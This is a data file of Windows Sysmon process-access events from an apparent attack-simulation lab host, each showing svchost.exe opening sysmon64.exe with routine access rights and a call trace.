{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
